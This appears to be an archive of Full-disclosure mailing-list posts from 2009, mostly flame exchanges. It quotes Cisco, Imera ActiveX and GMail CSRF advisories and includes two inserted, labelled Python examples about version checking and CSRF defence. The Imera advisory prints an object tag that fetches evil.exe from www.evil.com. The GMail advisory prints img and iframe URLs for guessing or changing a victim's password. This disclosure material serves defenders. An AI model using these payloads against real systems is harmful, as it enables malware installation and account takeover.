Re: [Full-disclosure] Apple Safari ... DoS Vulnerability

2009-03-04 Thread Jason Starks
I know, it's insane. It is a new trend, though, just like people registering
gmail accounts just to flame and troll on FD!

It's like, your credibility like, goes like, ok you start like at 0, and then
like, it goes like to -1, and like, then even lower like.

Absolutely genius.

x0x0x0x0x0x0x0x0x0x

On Tue, Mar 3, 2009 at 6:28 PM, Biz Marqee biz.mar...@gmail.com wrote:

 This was 2 years well spent... NOT!

 Seriously what is with all these people popping up releasing advisories
 that are absolute SHIT? Is it to try and get jobs or what?


 On Tue, Mar 3, 2009 at :55 AM, ISecAuditors Security Advisories 
 advisories at isecauditors.com wrote:


Re: [Full-disclosure] Cisco Security Advisory: Cisco 7600 Series Router Session Border Controller Denial of Service Vulnerability

2009-03-04 Thread Jason Starks
That is why the world should use Linksys.

On Wed, Mar 4, 2009 at 11:30 AM, Cisco Systems Product Security Incident
Response Team ps...@cisco.com wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Cisco Security Advisory: Cisco 7600 Series Router Session Border
 Controller Denial of Service Vulnerability

 Document ID: 109483

 Advisory ID: cisco-sa-20090304-sbc

 http://www.cisco.com/warp/public/707/cisco-sa-20090304-sbc.shtml

 Revision 1.0

 For Public Release 2009 March 4 1600 UTC (GMT)

 - -

 Summary
 ===

 A denial of service (DoS) vulnerability exists in the Cisco Session
 Border Controller (SBC) for the Cisco 7600 series routers. Cisco has
 released free software updates that address this vulnerability.
 Workarounds that mitigate this vulnerability are available.

 This advisory is posted at
 http://www.cisco.com/warp/public/707/cisco-sa-20090304-sbc.shtml

 Affected Products
 =

 Vulnerable Products
 +--

 All Cisco ACE-based SBC modules running software versions prior to
 3.0(2) are affected.

 To determine the version of the Cisco SBC software running on a
 system, log in to the device and issue the show version command to
 display the system banner.

card_A/Admin# show version
  system image file: [LCP] disk0:c76-sbck9-mzg.3.0.1_AS3_0_00.bin
output truncated


 Cisco SBC software version 3.0.1 is running in the device used in
 this example.

 Products Confirmed Not Vulnerable
 +

 The Cisco XR 12000 Series SBC is not vulnerable. Additionally, the
 Cisco ACE Module, Cisco ACE 4710 Application Control Engine, Cisco
 ACE XML Gateway, Cisco ACE Web Application Firewall, and the Cisco
 ACE GSS (Global Site Selector) 4400 Series are not affected by this
 vulnerability. No other Cisco products are currently known to be
 affected by this vulnerability.

 Details
 ===

 The Session Border Controller (SBC) enables direct IP-to-IP
 interconnect between multiple administrative domains for
 session-based services providing protocol interworking, security, and
 admission control and management. The SBC is a multimedia device that
 sits on the border of a network and controls call admission to that
 network. A vulnerability exists in the Cisco SBC where an
 unauthenticated attacker may cause the Cisco SBC card to reload by
 sending crafted TCP packets over port 2000. Repeated exploitation
 could result in a sustained DoS condition.

 Note: Only the Cisco SBC module reloads after successful
 exploitation. The Cisco 7600 series router does not reload and it is
 not affected by this vulnerability.

 Note: TCP port 2000 is typically used by Skinny Call Control Protocol
 (SCCP) applications. However, the Cisco SBC module uses TCP port 2000
 for high availability (redundancy) communication, but does not use
 the SCCP for this purpose.

 This vulnerability is documented in Cisco Bug ID CSCsq18958
 (registered customers only) and has been assigned Common
 Vulnerabilities and Exposures (CVE) ID CVE-2009-0619.

 Vulnerability Scoring Details
 =

 Cisco has provided scores for the vulnerability in this advisory
 based on the Common Vulnerability Scoring System (CVSS). The CVSS
 scoring in this Security Advisory is done in accordance with CVSS
 version 2.0.

 CVSS is a standards-based scoring method that conveys vulnerability
 severity and helps determine urgency and priority of response.

 Cisco has provided a base and temporal score. Customers can then
 compute environmental scores to assist in determining the impact of
 the vulnerability in individual networks.

 Cisco has provided an FAQ to answer additional questions regarding
 CVSS at

 http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

 Cisco has also provided a CVSS calculator to help compute the
 environmental impact for individual networks at

 http://intellishield.cisco.com/security/alertmanager/cvss

 CVSS Base Score - 7.8

 Access Vector   - Network
 Access Complexity   - Low
 Authentication  - None
 Confidentiality Impact  - None
 Integrity Impact- None
 Availability Impact - Complete

 CVSS Temporal Score - 6.4

 Exploitability  - Functional
 Remediation Level   - Official-Fix
 Report Confidence   - Confirmed

 Impact
 ==

 Successful exploitation of the vulnerability may cause a reload of
 the affected device. Repeated exploitation could result in a
 sustained DoS condition.

 Software Versions and Fixes
 ===

 This vulnerability has been corrected in Cisco SBC software release
 3.0(2).

 Cisco SBC software can be downloaded from:

 http://www.cisco.com/pcgi-bin/tablebuild.pl/sbc-7600-crypto

 When considering software upgrades, also consult
 http://www.cisco.com/go/psirt and any subsequent advisories to
 determine exposure and a complete 
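As an added illustration (not Cisco's code), a small check that pulls the SBC software version out of the `show version` banner format quoted in the advisory and compares it with the fixed release 3.0(2). The sample banner is constructed after the advisory's example, and the image-name layout `<name>.<major>.<minor>.<release>_<build>.bin` is assumed to hold for other releases.

```python
"""Check a Cisco SBC 'show version' banner against the fixed release.

The advisory's example banner names the running image as
disk0:c76-sbck9-mzg.3.0.1_AS3_0_00.bin, i.e. SBC software 3.0.1, and states
that releases prior to 3.0(2) are affected. This helper extracts the dotted
version from that image-name layout (assumed to hold for other releases) and
compares it with 3.0(2). The sample banner is constructed after the advisory.
"""
import re

FIXED_RELEASE = (3, 0, 2)  # Cisco SBC software 3.0(2), the first fixed release

# "system image file: [LCP] disk0:<name>.<major>.<minor>.<release>_<build>.bin"
_IMAGE_RE = re.compile(
    r"system image file:\s*\[\w+\]\s*\S+?\.(\d+)\.(\d+)\.(\d+)[_.]"
)


def parse_sbc_version(banner: str):
    """Return (major, minor, release) from the banner, or None if absent."""
    m = _IMAGE_RE.search(banner)
    return tuple(int(x) for x in m.groups()) if m else None


def is_affected(banner: str) -> bool:
    """True when the running SBC software is older than 3.0(2)."""
    version = parse_sbc_version(banner)
    if version is None:
        raise ValueError("no SBC image version found in banner")
    return version < FIXED_RELEASE


# Constructed sample, following the advisory's own example output.
SAMPLE_BANNER = """card_A/Admin# show version
  system image file: [LCP] disk0:c76-sbck9-mzg.3.0.1_AS3_0_00.bin
<output truncated>
"""

if __name__ == "__main__":
    major, minor, release = parse_sbc_version(SAMPLE_BANNER)
    verdict = "affected, upgrade to 3.0(2)" if is_affected(SAMPLE_BANNER) else "not affected"
    print("running %d.%d(%d): %s" % (major, minor, release, verdict))
```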

Re: [Full-disclosure] Imera ImeraIEPlugin ActiveX Control Remote Code Execution

2009-03-04 Thread Jason Starks
That is why most of them are submitted to bugtraq (ew), and not FD, where
they are often discredited in various ways. You see, bugtraq will reject 4
out of 7 postings if you're not a subscriber to their super fun security
package, which offers lots of enjoyment of white hat and hacking zone-h
labs. On this ridiculous list, it's hard not to get your post through! Kazaa!

On Wed, Mar 4, 2009 at 3:51 AM, bob jones bhold...@gmail.com wrote:

 doesn't submitting lame bugs in useless apps ever get old?

 On Tue, Mar 3, 2009 at 9:12 AM, Elazar Broad ela...@hushmail.com wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Who:
  Imera(http://www.imera.com)
  Imera TeamLinks Client(http://teamlinks.imera.com/install.html)

 What:
  ImeraIEPlugin.dll
  Version 1.0.2.54
  Dated 12/02/2008
  {75CC8584-86D4-4A50-B976-AA72618322C6}
  http://teamlinks.imera.com/ImeraIEPlugin.cab

 How:
  This control is used to install the Imera TeamLinks Client
 package. The control fails to validate that the content it downloads
 and installs is indeed the Imera TeamLinks Client software.

 Exploiting this issue is quite simple, like so:

 <object classid="clsid:75CC8584-86D4-4A50-B976-AA72618322C6" id="obj">
   <param name="DownloadProtocol" value="http" />
   <param name="DownloadHost" value="www.evil.com" />
   <param name="DownloadPort" value="80" />
   <param name="DownloadURI" value="evil.exe" />
 </object>

 Fix:
  The vendor has been notified.

 Workaround:
  Set the killbit for the affected control, see
 http://support.microsoft.com/kb/240797.
 Use the Java installer for TeamLinks Client or install the software
 manually from: http://teamlinks.imera.com/download.html

 Elazar

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




Re: [Full-disclosure] Zabbix 1.6.2 Frontend Multiple Vulnerabilities

2009-03-04 Thread Jason Starks
All bugs are worth something! Not.

On Wed, Mar 4, 2009 at 11:23 AM, valdis.kletni...@vt.edu wrote:

 On Wed, 04 Mar 2009 09:13:40 EST, bobby.mug...@hushmail.com said:

  Is the remark about Italia meant as an excuse for stupidity?
  Racism is not acceptable on this list.

 Oddly enough, I read it as Italians believe in creating enough jobs
 so everybody is employed.  Here in the US, the same effect can usually
 be observed at any Dept of Public Works project site - one guy with a
 jackhammer,
 3 guys with the slow/stop traffic signs, several project supervisors, and
 another 4 or 5 guys with no obvious function there at all...


Re: [Full-disclosure] Apple Safari ... DoS Vulnerability

2009-03-04 Thread Jason Starks
Ah, probably not. Your stringing together words to make sentences is what
I'll regret reading. I'll continue to use my muscle milk and you'll continue
to work your 9-5. The world turns once again!

On Wed, Mar 4, 2009 at 4:06 PM, Valdis' Mustache 
security.musta...@gmail.com wrote:

 Mister Snarks,

 I've never been anything but who I purport to be, the humble upper
 facial hair quadrant of a loquacious sysadmin. Low of birth, though
 noble in aspiration, a student of history and of the many mustaches
 who came before myself.

 You, young scholar, should be wary, though! Prospective employers do
 make regular use of search engines, googling potential candidates to
 gain insight into possible character flaws!

 True, your clean and jerk abilities as archived on the YouTube are
 admirable, but acting a fool on security lists is something normally
 reserved only for those in academia, who are markedly difficult if not
 impossible to unseat from their comfortable chairs, as indisputably
  underscored by the e-antics of this mustache's owner, and, of course,
 Mssr. Schmehl.

 You'll come to regret your lack of anonymity, as your posts will live
  on for eternity, much as I've come to regret my unfortunate
 association with the unruly beardlike growth connecting to me from the
 south, and my unavoidable tenuous connection with those objectionable
 and uncouth sideburns.


 Your humble servant,
 I baffi di Valdis

 On Wed, Mar 4, 2009 at 12:55 PM, Jason Starks jstarks...@gmail.com
 wrote:
  I know, it's insane. It is a new trend, though, just like people
  registering gmail accounts just to flame and troll on FD!
 
  It's like, your credibility like, goes like, ok you start like at 0, and
  then like, it goes like to -1, and like, then even lower like.
 
  Absolutely genius.
 
  x0x0x0x0x0x0x0x0x0x
 
  On Tue, Mar 3, 2009 at 6:28 PM, Biz Marqee biz.mar...@gmail.com wrote:
 
  This was 2 years well spent... NOT!
 
  Seriously what is with all these people popping up releasing advisories
  that are absolute SHIT? Is it to try and get jobs or what?
 
 
  On Tue, Mar 3, 2009 at :55 AM, ISecAuditors Security Advisories 
  advisories at isecauditors.com wrote:
 

Re: [Full-disclosure] Apple Safari ... DoS Vulnerability

2009-03-03 Thread Jason Starks
Mr. Mustache, it is obvious that I have more talent than a box of
chocolates, and that you envy the sadistic nature of your fellow trolls on
this list. Point blank.

On Tue, Mar 3, 2009 at 6:18 AM, bobby.mug...@hushmail.com wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Dear Valdis,

 I have been able to reproduce a similar situation using Firefox
 under MacOSX, using different websites and a significantly larger
 number of tabs.  Do you think these issues might be related or are
 they operating system specific?  What model of CPU were you testing
 this issue under?

 Thanks,
 - -bm

 On Mon, 02 Mar 2009 23:41:53 -0500 Valdis' Mustache
 security.musta...@gmail.com wrote:
 I would like to point out that I have been able to create a hung
 state in the Firefox browser by opening 30 simultaneous tabs pointed
 at http://www.welcometointernet.org/lawnmower/ and adding a 31st tab
 viewing http://www.hotrussianbrides.com.
 
 Also, I am not amused.
 
 
 Your humble servant,
 Ze Mustache von Kletnieks
 
 On Mon, Mar 2, 2009 at 10:29 PM,  bobby.mug...@hushmail.com wrote:
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA1
 
  Dear Nick,
 
  You and Thierry Loller are wrong.
 
  - -bm
 
  On Mon, 02 Mar 2009 21:28:17 -0500 Nick FitzGerald
  n...@virus-l.demon.co.uk wrote:
 Chris Evans to Thierry Zoller:
 
   Example
   If a chrome tab can be crashed arbitrarily (remotely) it is a DoS attack
   but with ridiculously low impact to the end-user as it only crashes the tab
   it was subjected to, and not the whole browser or operating system.
   But the fact remains that this was the impact of a DoS condition,
   the tab crashes arbitrarily.
 
  Eh? If you visit www.evil.com and your tab crashes, that's no
  different from www.evil.com closing its own tab with Javascript.
 
 But what if www.evil.com has run an injection attack of some kind (SQL,
 XSS in blog comments, etc, etc) against www.stupid.com?
 
 Visitors to stupid.com then suffer a DoS...
 
 Yes, stupid.com should run their site better, fix their myriad XSS
 holes, etc, etc.
 
 But this is the Internet, so this software flaw can be leveraged as a
 security vulnerability.
 
 I'm with Thierry on this...
 
 
 Regards,
 
 Nick FitzGerald
 

Re: [Full-disclosure] [ISecAuditors Security Advisories] CSRF vulnerability in GMail service

2009-03-03 Thread Jason Starks
That is one hell of a timeline.

On Tue, Mar 3, 2009 at 5:55 AM, ISecAuditors Security Advisories 
advisor...@isecauditors.com wrote:

 =
 INTERNET SECURITY AUDITORS ALERT 2007-003
 - Original release date: August 1st, 2007
 - Last revised: January 11th, 2009
 - Discovered by: Vicente Aguilera Diaz
 - Severity: 3/5
 =

 I. VULNERABILITY
 -
 CSRF vulnerability in GMail service

 II. BACKGROUND
 -
 Gmail is Google's free webmail service. It comes with built-in Google
 search technology and over 2,600 megabytes of storage (and growing
 every day). You can keep all your important messages, files and
 pictures forever, use search to quickly and easily find anything
 you're looking for, and make sense of it all with a new way of viewing
 messages as part of conversations.

 III. DESCRIPTION
 -
 Cross-Site Request Forgery, also known as one click attack or session
 riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of
 malicious exploit of websites. Although this type of attack has
 similarities to cross-site scripting (XSS), cross-site scripting
 requires the attacker to inject unauthorized code into a website,
 while cross-site request forgery merely transmits unauthorized
 commands from a user the website trusts.

 GMail is vulnerable to CSRF attacks in the Change Password
 functionality. The only token used to authenticate the user is a session
 cookie, and this cookie is sent automatically by the browser in every
 request.

 An attacker can create a page that includes requests to the Change
 password functionality of GMail and modify the passwords of the users
 who, being authenticated, visit the page of the attacker.

 The attack is facilitated because the Change Password request can be
 made via the HTTP GET method instead of the POST method that the
 Change Password form normally uses.

 IV. PROOF OF CONCEPT
 -
 1. An attacker creates a web page csrf-attack.html that makes many
 HTTP GET requests to the Change Password functionality.

 For example, a password cracking of 3 attempts (see OldPasswd
 parameter):
 ...
 <img src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
 <img src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
 <img src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
 ...

 or with hidden frames:
 ...
 <iframe src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save"></iframe>
 <iframe src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save"></iframe>
 <iframe src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save"></iframe>
 ...

 The attacker can deliberately use a weak new password (see Passwd
 and PasswdAgain parameters); this way he can learn whether the analysed
 password is correct without needing to modify the password of the victim
 user.

 Using weak passwords, the Change Password response is:
  - "The password you gave is incorrect.", if the analysed password
 is not correct.
  - "We're sorry, but you've selected an insecure password. In order
 to protect the security of your account, please click Password
 Strength to get tips on choosing to safer password.", if the
 analysed password is correct and the victim password is not modified.

 If the attacker wants to modify the password of the victim user, the
 expected response message is: "Your new password has been saved - OK".

 In any case, the attacker evades the restrictions imposed by the
 captcha of the authentication form.

 2. A user authenticated in GMail visits the csrf-attack.html page
 controlled by the attacker.

 For example, the attacker sends a mail to the victim (a GMail account)
 and induces the victim to visit his page (social engineering). This way,
 the attacker ensures that the victim is authenticated.

 3. The password cracking is executed transparently to the victim.

 V. BUSINESS IMPACT
 -
 - Selective DoS on users of the GMail service (changing user password).
 - Possible access to the mail of other GMail users.

 VI. SYSTEMS AFFECTED
 -
 Gmail service.

 VII. SOLUTION
 -
 No solution provided by vendor.

 VIII. REFERENCES
 -
 http://www.gmail.com

 IX. CREDITS
 -
 This vulnerability has been discovered and reported by
 Vicente Aguilera Diaz (vaguilera (at) 
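The Change Password flaw described in the advisory above, modelled as an added example that is not part of the advisory or of Google's code: a handler that trusts the session cookie alone and answers GET requests, beside a hardened handler that requires POST and a per-session anti-CSRF token checked before any password comparison. The user, session and password values, the `SID` cookie name, the `csrf_token` parameter and the length-based strength rule are all constructed assumptions.

```python
"""Model of the Change Password endpoint from the advisory.

Vulnerable variant: any HTTP method, and the session cookie (which the
browser attaches to cross-site <img>/<iframe> loads) is the only proof of
intent, so a third-party page can drive it; its reply also tells the caller
whether OldPasswd was right. Hardened variant: POST only, plus a per-session
anti-CSRF token that a foreign origin cannot read; forged requests are
refused before any password comparison. All data below is constructed.
"""
import hmac
import secrets
from dataclasses import dataclass

# Constructed sample state: one logged-in user with a known session cookie.
USERS = {"victim": "Secret-Pass-2"}
SESSIONS = {"sid-victim-1": {"user": "victim", "csrf": secrets.token_hex(16)}}

OK_MSG = "Your new password has been saved - OK"
WRONG_MSG = "The password you gave is incorrect."
WEAK_MSG = "We're sorry, but you've selected an insecure password."


@dataclass
class Request:
    method: str
    cookies: dict
    params: dict


def _user_from_cookie(req):
    sess = SESSIONS.get(req.cookies.get("SID"))
    return sess["user"] if sess else None


def _change_password(user, old, new, again):
    """Password logic shared by both handlers; returns the advisory's messages."""
    if new != again:
        return "Passwords do not match."
    if USERS[user] != old:
        return WRONG_MSG
    if len(new) < 8:  # assumed stand-in for the real strength policy
        return WEAK_MSG  # old password confirmed, but nothing changed
    USERS[user] = new
    return OK_MSG


def update_passwd_vulnerable(req):
    """Accepts GET; the cookie alone authorises the change (forgeable)."""
    user = _user_from_cookie(req)
    if user is None:
        return 401, "Login required"
    p = req.params
    return 200, _change_password(user, p.get("OldPasswd", ""),
                                 p.get("Passwd", ""), p.get("PasswdAgain", ""))


def update_passwd_hardened(req):
    """POST only, and the request must carry this session's anti-CSRF token."""
    user = _user_from_cookie(req)
    if user is None:
        return 401, "Login required"
    if req.method != "POST":
        return 405, "Method not allowed"  # no state change on GET
    expected = SESSIONS[req.cookies["SID"]]["csrf"]
    supplied = req.params.get("csrf_token", "")
    if not hmac.compare_digest(expected, supplied):
        return 403, "Missing or invalid CSRF token"  # refused before any oracle
    p = req.params
    return 200, _change_password(user, p.get("OldPasswd", ""),
                                 p.get("Passwd", ""), p.get("PasswdAgain", ""))


def cross_site_request(method, old_guess):
    """A request as a foreign page's <img>/<iframe> or form would send it:
    the browser attaches the cookie, but no token (unreadable cross-site)."""
    return Request(method, {"SID": "sid-victim-1"},
                   {"OldPasswd": old_guess, "Passwd": "abc123",
                    "PasswdAgain": "abc123"})


def same_origin_post(old, new):
    """A request from the real Change Password form, which embeds the token."""
    return Request("POST", {"SID": "sid-victim-1"},
                   {"OldPasswd": old, "Passwd": new, "PasswdAgain": new,
                    "csrf_token": SESSIONS["sid-victim-1"]["csrf"]})


if __name__ == "__main__":
    print(update_passwd_vulnerable(cross_site_request("GET", "Secret-Pass-2")))
    print(update_passwd_hardened(cross_site_request("GET", "Secret-Pass-2")))
    print(update_passwd_hardened(same_origin_post("Secret-Pass-2", "Long-Enough-9")))
```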

Re: [Full-disclosure] Apple Safari ... DoS Vulnerability

2009-03-03 Thread Jason Starks
Mr. Mustache,

There is a missing s on the end of my last name.

Yours truly,

Jason Bench Press Starks

On Tue, Mar 3, 2009 at 5:45 PM, bobby.mug...@hushmail.com wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Mr. Stark,

 Adhering to the tradition of my fathers, I do not sport any facial
 hair and take offense to your comment, and since you're obviously
 lacking basic observational skills I highly doubt you're even as
 talented as my Cadburys, at anything.

 - -bm

 On Tue, 03 Mar 2009 11:11:35 -0500 Jason Starks
 jstarks...@gmail.com wrote:

Re: [Full-disclosure] Apple Safari ... DoS Vulnerability

2009-03-03 Thread Jason Starks
Right..

On Tue, Mar 3, 2009 at 5:45 PM, bobby.mug...@hushmail.com wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Mr. Stark,

There.

On Tue, Mar 3, 2009 at 5:56 PM, bobby.mug...@hushmail.com wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Where?

 - -bm

 On Tue, 03 Mar 2009 17:54:51 -0500 Jason Starks
 jstarks...@gmail.com wrote:
 Mr. Mustache,
 
 There is a missing s on the end of my last name.
 
 Yours truly,
 
 Jason Bench Press Starks
 
 On Tue, Mar 3, 2009 at 5:45 PM, bobby.mug...@hushmail.com wrote:
 
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA1
 
  Mr. Stark,
 
  Adhering to the tradition of my fathers, I do not sport any
 facial
  hair and take offense to your comment, and since you're
 obviously
  lacking basic observational skills I highly doubt you're even as
  talented as my Cadburys, at anything.
 
  - -bm
 
  On Tue, 03 Mar 2009 11:11:35 -0500 Jason Starks
  jstarks...@gmail.com wrote:
  Mr. Mustache, it is obvious that I have more talent than a box
 of
  chocolates, and that you envy the sadistic nature of your
 fellow
  trolls on
  this list. Point blank.
  
  On Tue, Mar 3, 2009 at 6:18 AM, bobby.mug...@hushmail.com
 wrote:
  
   -BEGIN PGP SIGNED MESSAGE-
   Hash: SHA1
  
   Dear Valdis,
  
   I have been able to reproduce a similar situation using
 Firefox
   under MacOSX, using different websites and a significantly
  larger
   number of tabs.  Do you think these issues might be related
 or
  are
   they operating system specific?  What model of CPU were you
  testing
   this issue under?
  
   Thanks,
   - -bm
  
   On Mon, 02 Mar 2009 23:41:53 -0500 Valdis' Mustache
   security.musta...@gmail.com wrote:
   I would like to point out that I have been able to create a
  hung
   state in the Firefox browser by opening 30 simultaneous tabs
   pointed
   at http://www.welcometointernet.org/lawnmower/ and adding a
  31st
   tab
   viewing http://www.hotrussianbrides.com.
   
   Also, I am not amused.
   
   
   Your humble servant,
   Ze Mustache von Kletnieks
   
   On Mon, Mar 2, 2009 at 10:29 PM,
 bobby.mug...@hushmail.com
   wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
   
Dear Nick,
   
You and Thierry Loller are wrong.
   
- -bm
   
On Mon, 02 Mar 2009 21:28:17 -0500 Nick FitzGerald
  n...@virus-
l.demon.co.uk wrote:
   Chris Evans to Thierry Zoller:
   
 Example
 If a chrome tab can be crashed arbitrarily (remotely)
 it
  is
   a
   DoS attack
 but with ridiculously low impact to the end-user as it
 only
   crashes the tab
 it was subjected to, and not the whole browser or
  operation
   system.
 But the fact remains that this was the impact of a DoS
   condition,
 the tab crashes arbitrarily.
   
Eh? If you visit www.evil.com and your tab crashes,
 that's
  no
different from www.evil.com closing its own tab with
   Javascript.
   
   But what if www.evil.com has run an injection attack of
 some
   kind
   (SQL,
   XSS in blog comments, etc, etc) against www.stupid.com?
   
   Visitors to stupid.com then suffer a DoS...
   
   Yes, stupid.com should run their site better, fix their
  myriad
   XSS
   holes,
   etc, etc.
   
   But this is the Internet, so this software flaw can be leveraged
   as a security vulnerability.
   
   I'm with Thierry on this...
   
   
   Regards,
   
   Nick FitzGerald
   
   

Re: [Full-disclosure] Apple Safari ... DoS Vulnerability

2009-03-03 Thread Jason Starks
Did Safari have a bug or something...

On Tue, Mar 3, 2009 at 6:21 PM, Valdis' Mustache 
security.musta...@gmail.com wrote:

 Mr. Snarks,

 If you can't tell the difference between the Zimbabwean president and
 what's under my esteemed owner's nose I suggest you consult RFC 2821
 for guidance.

 I am NOT amused.


 Your humble servant,
 V knír z Valdis

 On Tue, Mar 3, 2009 at 6:01 PM, Jason Starks jstarks...@gmail.com wrote:
  Right..
 
 On Tue, Mar 3, 2009 at 5:45 PM, bobby.mug...@hushmail.com wrote:
 
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA1
 
  Mr. Stark,
 
  There.
 
  On Tue, Mar 3, 2009 at 5:56 PM, bobby.mug...@hushmail.com wrote:
 
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA1
 
  Where?
 
  - -bm
 
  On Tue, 03 Mar 2009 17:54:51 -0500 Jason Starks
  jstarks...@gmail.com wrote:
  Mr. Mustache,
  
  There is a missing s on the end of my last name.
  
  Yours truly,
  
  Jason Bench Press Starks
  
  On Tue, Mar 3, 2009 at 5:45 PM, bobby.mug...@hushmail.com wrote:
  
   -BEGIN PGP SIGNED MESSAGE-
   Hash: SHA1
  
   Mr. Stark,
  
   Adhering to the tradition of my fathers, I do not sport any
  facial
   hair and take offense to your comment, and since you're
  obviously
   lacking basic observational skills I highly doubt you're even as
   talented as my Cadburys, at anything.
  
   - -bm
  
   On Tue, 03 Mar 2009 11:11:35 -0500 Jason Starks
   jstarks...@gmail.com wrote:
   Mr. Mustache, it is obvious that I have more talent than a box
  of
   chocolates, and that you envy the sadistic nature of your
  fellow
   trolls on
   this list. Point blank.
   
   On Tue, Mar 3, 2009 at 6:18 AM, bobby.mug...@hushmail.com
  wrote:
   
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
   
Dear Valdis,
   
I have been able to reproduce a similar situation using
  Firefox
under MacOSX, using different websites and a significantly
   larger
number of tabs.  Do you think these issues might be related
  or
   are
they operating system specific?  What model of CPU were you
   testing
this issue under?
   
Thanks,
- -bm
   
On Mon, 02 Mar 2009 23:41:53 -0500 Valdis' Mustache
security.musta...@gmail.com wrote:
I would like to point out that I have been able to create a
   hung
state in the Firefox browser by opening 30 simultaneous tabs
pointed
at http://www.welcometointernet.org/lawnmower/ and adding a
   31st
tab
viewing http://www.hotrussianbrides.com.

Also, I am not amused.


Your humble servant,
Ze Mustache von Kletnieks

On Mon, Mar 2, 2009 at 10:29 PM,
  bobby.mug...@hushmail.com
wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Dear Nick,

 You and Thierry Loller are wrong.

 - -bm

 On Mon, 02 Mar 2009 21:28:17 -0500 Nick FitzGerald
   n...@virus-
 l.demon.co.uk wrote:
Chris Evans to Thierry Zoller:

  Example
  If a chrome tab can be crashed arbitrarily (remotely)
  it
   is
a
DoS attack
  but with ridiculously low impact to the end-user as it
  only
crashes the tab
  it was subjected to, and not the whole browser or
   operation
system.
  But the fact remains that this was the impact of a DoS
condition,
  the tab crashes arbitrarily.

 Eh? If you visit www.evil.com and your tab crashes,
  that's
   no
 different from www.evil.com closing its own tab with
Javascript.

But what if www.evil.com has run an injection attack of
  some
kind
(SQL,
XSS in blog comments, etc, etc) against www.stupid.com?

Visitors to stupid.com then suffer a DoS...

Yes, stupid.com should run their site better, fix their
   myriad
XSS
holes,
etc, etc.

But this is the Internet, so this software flaw can be leveraged
as a security vulnerability.

I'm with Thierry on this...


Regards,

Nick FitzGerald



[Full-disclosure] Jason Starks has invited you to open a Google mail account

2009-03-03 Thread Jason Starks
I've been using Gmail and thought you might like to try it out. Here's
an invitation to create an account.

---

Jason Starks has invited you to open a free Gmail account.

To accept this invitation and register for your account, visit
http://mail.google.com/mail/a-76f552dd78-20b7d044cc-fd7096e558

Once you create your account, Jason Starks will be notified with
your new email address so you can stay in touch with Gmail!

If you haven't already heard about Gmail, it's a new search-based webmail
service that offers:

- Over 2,700 megabytes (two gigabytes) of free storage
- Built-in Google search that instantly finds any message you want
- Automatic arrangement of messages and related replies into
  conversations
- Powerful spam protection using innovative Google technology
- No large, annoying ads--just small text ads and related pages that are
  relevant to the content of your messages

To learn more about Gmail before registering, visit:
http://mail.google.com/mail/help/benefits.html

And, to see how easy it can be to switch to a new email service, check
out our new switch guide: http://mail.google.com/mail/help/switch/

We're still working every day to improve Gmail, so we might ask for your
comments and suggestions periodically.  We hope you'll like Gmail.  We
do.  And, it's only going to get better.

Thanks,

The Gmail Team

(If clicking the URLs in this message does not work, copy and paste them
into the address bar of your browser).



Re: [Full-disclosure] Apple Safari ... DoS Vulnerability

2009-03-02 Thread Jason Starks
Grow up, really.

On Mon, Mar 2, 2009 at 11:41 PM, Valdis' Mustache 
security.musta...@gmail.com wrote:

 I would like to point out that I have been able to create a hung
 state in the Firefox browser by opening 30 simultaneous tabs pointed
 at http://www.welcometointernet.org/lawnmower/ and adding a 31st tab
 viewing http://www.hotrussianbrides.com.

 Also, I am not amused.


 Your humble servant,
 Ze Mustache von Kletnieks

 On Mon, Mar 2, 2009 at 10:29 PM,  bobby.mug...@hushmail.com wrote:
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA1
 
  Dear Nick,
 
  You and Thierry Loller are wrong.
 
  - -bm
 
  On Mon, 02 Mar 2009 21:28:17 -0500 Nick FitzGerald n...@virus-
  l.demon.co.uk wrote:
 Chris Evans to Thierry Zoller:
 
   Example
   If a chrome tab can be crashed arbitrarily (remotely) it is a
 DoS attack
   but with ridiculously low impact to the end-user as it only
 crashes the tab
   it was subjected to, and not the whole browser or operation
 system.
   But the fact remains that this was the impact of a DoS
 condition,
   the tab crashes arbitrarily.
 
  Eh? If you visit www.evil.com and your tab crashes, that's no
  different from www.evil.com closing its own tab with Javascript.
 
 But what if www.evil.com has run an injection attack of some kind
 (SQL,
 XSS in blog comments, etc, etc) against www.stupid.com?
 
 Visitors to stupid.com then suffer a DoS...
 
 Yes, stupid.com should run their site better, fix their myriad XSS
 holes,
 etc, etc.
 
 But this is the Internet, so this software flaw can be leveraged
 as a security vulnerability.
 
 I'm with Thierry on this...
 
 
